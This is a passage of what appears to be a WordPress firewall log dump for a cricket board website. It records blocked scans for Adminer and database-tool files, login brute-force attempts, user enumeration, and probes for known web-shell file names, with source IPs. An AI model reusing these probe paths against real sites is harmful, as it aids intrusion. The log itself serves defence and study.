Safari\\/537.36\"}','LytVi15hQCGfMc2XIZTYEO6q',0,1674740014.1557,150,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer/adminer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','WNzretdIcTjbClUJMvX3QR92',0,1674740015.6144,132,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adm.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2762.73 Safari\\/537.36\"}','bhAgYJyVik2QvNUaL7f168Xj',0,1674740016.1740,130,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.7.7.php','','{\"1\":\"Mozilla\\/5.0 (X11; OpenBSD i386) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','NTOulrwv8RimpdIyWs6X7LZH',0,1674740016.7270,101,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.8.0.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2866.71 Safari\\/537.36\"}','HmeSUV2RJvXo6hPiat9wGyTZ',0,1674740017.2562,124,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/admin/adminer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/40.0.2214.93 Safari\\/537.36\"}','Hd8TprJhZwvWiqFt59EAsX3o',0,1674740017.8410,95,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/tools/adminer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','Lj5mVtC1XzZxwfhFSU6PQ4i8',0,1674740018.3555,151,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.7.7-mysql.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 4.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2049.0 Safari\\/537.36\"}','DNyinj94hsAdqlP2pOR6QJ0x',0,1674740018.9553,108,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.7.1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.4; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','GAcyMka2SwIosvDjR7tHfuxq',0,1674740019.4951,134,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.7.6.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','mcKg5fXhCVsWpqxQ6NkZIi0r',0,1674740020.0692,102,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.7.5.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\"}','woxuQil8U1TsDSC6vIqkdA2F',0,1674740020.5960,157,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.6.2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.2309.372 Safari\\/537.36\"}','bDd8J3NjfgqGlZrzOBaQcexY',0,1674740021.2045,95,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.8.0-mysql.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/34.0.1847.137 Safari\\/4E423F\"}','Rs9Yic20aAT7yeUBjIzvD3NG',0,1674740021.7169,93,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/_adminer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.0 Safari\\/537.36\"}','shkrGJyqUiMNavYg6EfC4ndD',0,1674740022.2284,123,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.7.8.php','','{\"1\":\"Mozilla\\/5.0 (X11; OpenBSD i386) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','8AGf6QBZj1hJLCg9nx5cowyE',0,1674740022.7822,125,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.6.3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\"}','9gjMqGtbJZfP1NxKOdQVHoX5',0,1674740023.3363,127,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.7.0.php','','{\"1\":\"Mozilla\\/5.0 (X11; OpenBSD i386) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','2yn4quv8Xrcdxw73tbRTNa9F',0,1674740023.9011,141,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.7.3.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2866.71 Safari\\/537.36\"}','V5IF0Za8E1XbW9cYKi36yLPH',0,1674740024.4841,174,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.7.3-mysql.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.0 Safari\\/537.36\"}','HRSy1a3efFobK9LNAOPY6G5c',0,1674740025.0929,119,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/sql.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','4dak62O3mAbBKhQiZ7I9pGPX',0,1674740025.6345,115,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-mysql.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','HQm7a4TYkRvUZfNchgtb2uG8',0,1674740026.2086,117,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.7.1-mysql.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.2117.157 Safari\\/537.36\"}','yL3KGC8F60c1AxOsHvmUDoMi',0,1674740027.4291,135,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.6.2-mysql.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.1 Safari\\/537.36\"}','08fgM2FC3kI7SrGoepKsVB1D',0,1674740028.0122,132,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.7.2.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2062.124 Safari\\/537.36\"}','uh8qLJKi5ajMzVwN73eEGfnH',0,1674740028.6039,140,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.8.0-en.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.2309.372 Safari\\/537.36\"}','Lsd321zqZDTNAhf4r9gEjwa6',0,1674740029.1696,124,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','5BWkrsxnotEeCPOFX8flhRUw',0,1674740029.7186,94,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.7.8-en.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/34.0.1866.237 Safari\\/537.36\"}','ARPLSpx9bjU6tWfy5HZOkzeK',0,1674740030.2569,123,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.7.8-mysql.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','VkAgGBWibyLFj8s3XZtmSr7Y',0,1674740030.8383,105,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.7.4.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','JOVycsIGoFreCWHLt4Y15dKn',0,1674740032.0178,117,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.7.6-mysql.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/40.0.2214.93 Safari\\/537.36\"}','VAWC4RlBDxfQt1b5juZcgmKk',0,1674740032.5619,101,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adm/adminer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\"}','CLQ1B8efbF29mlsnWVtNDX3p',0,1674740033.0828,132,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.7.5-mysql.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.2117.157 Safari\\/537.36\"}','hKpv9Pm60jIsD8MTVObdni4A',0,1674740033.6471,126,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.7.5-en.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.47 Safari\\/537.36\"}','kTNBA65PCzeXOgZLjmxa08Up',0,1674740034.2065,110,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.7.7-en.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.47 Safari\\/537.36\"}','XHkO1Z2LnuYaxN69vb5Mz8AG',0,1674740034.7675,101,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.7.0-mysql.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64) AppleWebKit\\/537.36 (KHTML like Gecko) Chrome\\/44.0.2403.155 Safari\\/537.36\"}','E6La0pSFDZvltodxPC9I3jUA',0,1674740035.2960,85,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.7.1-mysql-en.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\"}','McnyQlXztY9681DN2JEZI5VU',0,1674740035.8192,139,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.6.2-mysql-en.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2062.124 Safari\\/537.36\"}','N3EG4PsiICzV8Uy5J1FoxW6l',0,1674740036.4366,114,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.8.0-mysql-en.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.1 Safari\\/537.36\"}','zwvZf6W3HxFDIomaMXcidp1e',0,1674740036.9760,106,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.6.3-mysql.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2049.0 Safari\\/537.36\"}','wTcW6Vyju2FLExgCao7DHBtz',0,1674740037.5203,122,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.6.1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2049.0 Safari\\/537.36\"}','NEJvIWPqK1nc4VFtzB8j6ZQm',0,1674740038.0728,94,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.7.7-mysql-en.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.47 Safari\\/537.36\"}','hDewmQ4qV8Skntb7KYlHIRM2',0,1674740039.2512,148,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.6.2-en.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2866.71 Safari\\/537.36\"}','DSKlZuehzGiCJA5OwF4qM8Ek',0,1674740039.8401,101,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/data/adminer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/34.0.1866.237 Safari\\/537.36\"}','QouYzD5ZlyfqAVx0B1vSLC4U',0,1674740040.3555,95,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/mysql.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.1 Safari\\/537.36\"}','QIChnsqUXWMu14AZPimdEo2G',0,1674740040.8689,169,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/phpmyadmin.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2919.83 Safari\\/537.36\"}','J69kOiEcRjofdvTGhnSAbews',0,1674740042.1940,113,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/manager/adminer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\"}','zfDgsFPxtBKwS7E8RMWULvek',0,1674740044.1057,95,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.6.3-mysql-en.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.2309.372 Safari\\/537.36\"}','mJf6GuEByCtTaUAqIp1HZVlv',0,1674740044.6260,135,'','GET',403,0,700,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer-4.7.4-mysql.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.0 Safari\\/537.36\"}','CsKicaeSf2lHgOdQ04Rnk6mI',0,1674740045.8433,107,'','GET',403,0,700,0,1,'',0),('209.141.57.9',3515693321,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','O97vqR2j1AuLZctz6FCfUISp',0,1674740291.9650,115,'','POST',403,0,600,0,1,'',0),('107.189.1.148',1807548820,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','RaVuzHjEYm1iGBb5UFky0Mr7',0,1674778811.7167,111,'','POST',403,0,600,0,1,'',0),('147.78.47.249',2471374841,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/105.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/wp-content\\/plugins\\/wp-file-manager\\/lib\\/php\\/connector.minimal.php\"}','mqS3YJKjR56V1UwvWlLfp078',0,1674786109.4527,8199,'','GET',403,0,700,0,1,'',0),('107.189.6.184',1807550136,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\\/534.59.10 (KHTML, like Gecko) Version\\/5.1.9 Safari\\/534.59.10\"}','NwPFKq83oXfdl1LBYx50uTap',0,1674787042.2940,260,'','POST',403,0,600,0,1,'',0),('198.98.60.32',3328326688,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','01BbhorJn2TXpM7PK86y5xV4',0,1674807970.9992,243,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://yorkshirecricketboard.org.uk/wp-login.php?wp_lang=en_US','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','wQNrobtxLVBCXGs9uyfIdAn3',0,1674808815.1049,112,'','POST',403,0,600,0,1,'',0),('104.244.77.192',1760841152,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D201 Safari\\/9537.53\"}','gfhQFiEl6x8HrRD37mTCkMtY',0,1674821436.7945,137,'','POST',403,0,600,0,1,'',0),('13.81.59.92',223427420,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','HfEXu5g78cOsndKyMka6YZSt',0,1674830315.7515,242,'','POST',403,0,600,0,1,'',0),('5.188.62.26',96222746,'','https://yorkshirecricketboard.org.uk/wp-login.php?wp_lang=en_US','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','isvYGQTnw5f16EKAPUaJlBxN',0,1674838008.8118,150,'','POST',403,0,600,0,1,'',0),('161.35.52.207',2703439055,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','EZN8bXQ6Ml37JywYGFvVRiOc',0,1674838542.0941,184,'','POST',403,0,600,0,1,'',0),('205.185.121.252',3451484668,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','a2b6MIlHvsDpY7q5cEFWkSRn',0,1674842967.3574,229,'','POST',403,0,600,0,1,'',0),('178.18.254.87',2987589207,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','hxtnyK8S4YDArdFEk5Jcp23b',0,1674844628.5707,365,'','POST',403,0,600,0,1,'',0),('158.255.80.210',2667532498,'','https://yorkshirecricketboard.org.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','CBhEvTS8niFrZW2uUJp5HQf9',0,1674845206.3835,148,'','GET',403,0,520,0,1,'',0),('185.2.4.33',3103917089,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','wVEaCuc8l3rb4QGT5jD2LFgx',0,1674849602.8671,192,'','POST',403,0,600,0,1,'',0),('107.189.1.148',1807548820,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','A8ZkshraI3YOUQ1mc5PRxEnt',0,1674859392.6980,122,'','POST',403,0,600,0,1,'',0),('212.227.176.155',3571691675,'','https://yorkshirecricketboard.org.uk/wso112233.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','8LMhtHwOz3YFWbqsrlEV1v2f',0,1674860767.0434,127,'','GET',403,0,700,0,1,'',0),('212.227.176.155',3571691675,'','https://yorkshirecricketboard.org.uk/wp-content/wso112233.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','pyIl1QMWvNtVeEz8nXT67gkc',0,1674860768.6403,96,'','GET',403,0,700,0,1,'',0),('212.227.176.155',3571691675,'','https://yorkshirecricketboard.org.uk/bala.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','86hwDVZs5e4AH17uWUNyrK9B',0,1674860772.1533,192,'','GET',403,0,700,0,1,'',0),('212.227.176.155',3571691675,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/sid/sidwso.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','8Uud0PQrBsytLVfSZ9W5RKJF',0,1674860773.7198,104,'','GET',403,0,700,0,1,'',0),('212.227.176.155',3571691675,'','https://yorkshirecricketboard.org.uk/wp-content/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','eN0kofz2dH3KJy1pTDOZ98RS',0,1674860775.1204,104,'','GET',403,0,700,0,1,'',0),('212.227.176.155',3571691675,'','https://yorkshirecricketboard.org.uk/wp-includes/wp-class.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','0yYGp6H5Esw9uhNxz8XjAaZ2',0,1674860777.4116,113,'','GET',403,0,700,0,1,'',0),('212.227.176.155',3571691675,'','https://yorkshirecricketboard.org.uk/xleet-shell.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','1au8G4K3Dfrs9TeZxWot7plj',0,1674860778.8108,122,'','GET',403,0,700,0,1,'',0),('212.227.176.155',3571691675,'','https://yorkshirecricketboard.org.uk/wp-admin/xleet-shell.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','CSY2RT5FcI6MairNBQmfzH0D',0,1674860779.9893,110,'','GET',403,0,700,0,1,'',0),('144.126.223.177',2424233905,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','xW718ImYGfT6ZUEwqbdvBglD',0,1674864476.0627,1239,'','POST',403,0,600,0,1,'',0),('145.239.30.120',2448367224,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','0azfluJ39iRD4nhyNP58EwFH',0,1674868083.5010,166,'','POST',403,0,600,0,1,'',0),('157.245.207.53',2650132277,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','fsTuqX9nj3pm5h0bRgZavHBL',0,1674871726.0746,207,'','POST',403,0,600,0,1,'',0),('209.141.37.194',3515688386,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; Trident\\/7.0; rv:11.0) like Gecko\"}','T2BSfdq1rPE6ynsUxi4YuIR0',0,1674873982.9221,129,'','POST',403,0,600,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/themes/onelife/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 